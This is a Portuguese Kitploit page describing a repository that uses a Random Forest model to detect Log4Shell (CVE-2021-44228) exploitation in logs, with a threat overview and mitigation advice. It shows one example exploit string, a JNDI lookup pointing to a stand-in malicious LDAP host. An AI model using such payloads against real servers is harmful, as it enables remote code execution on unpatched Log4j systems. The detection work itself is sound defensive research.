Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!
Log4Shell-vulnerability-CVE-2021-44228- — Este repositório fornece uma análise aprofundada da vulnerabilidade Log4Shell (CVE-2021-44228) e implementa uma abordagem baseada em aprendizado de máquina para detectar tentativas de exploração em dados de log. | Kitploit
Este repositório fornece uma análise aprofundada da vulnerabilidade Log4Shell (CVE-2021-44228) e implementa uma abordagem baseada em aprendizado de máquina para detectar tentativas de exploração em dados de log.
Este repositório fornece uma análise aprofundada e a implementação de um Sistema de Detecção de Ameaças Log4Shell (CVE-2021-44228) baseado em Aprendizado de Máquina. Inclui:
Entendendo o Log4Shell: O que é e por que é perigoso
Coleta de Conjunto de Dados: Fontes e etapas de pré-processamento
Engenharia de Atributos: Extração de padrões maliciosos baseados em JNDI
Treinamento do Modelo de Aprendizado de Máquina: Detecção baseada em Random Forest
Resultados e Análise: Métricas de desempenho e gráficos de avaliação
Conclusão e Trabalhos Futuros
Visão Geral da Ameaça - Log4Shell (CVE-2021-44228)
Vulnerabilidade: Execução Remota de Código (RCE) no Apache Log4j 2
Exemplo de Exploração:
root@kitploit:~
${jndi:ldap://malicious-server.com/exploit}
Impacto: Permite que atacantes assumam o controle total dos sistemas afetados
Mitigação: Atualizar o Log4j para versões corrigidas (2.17.0 ou superior) e aplicar regras de firewall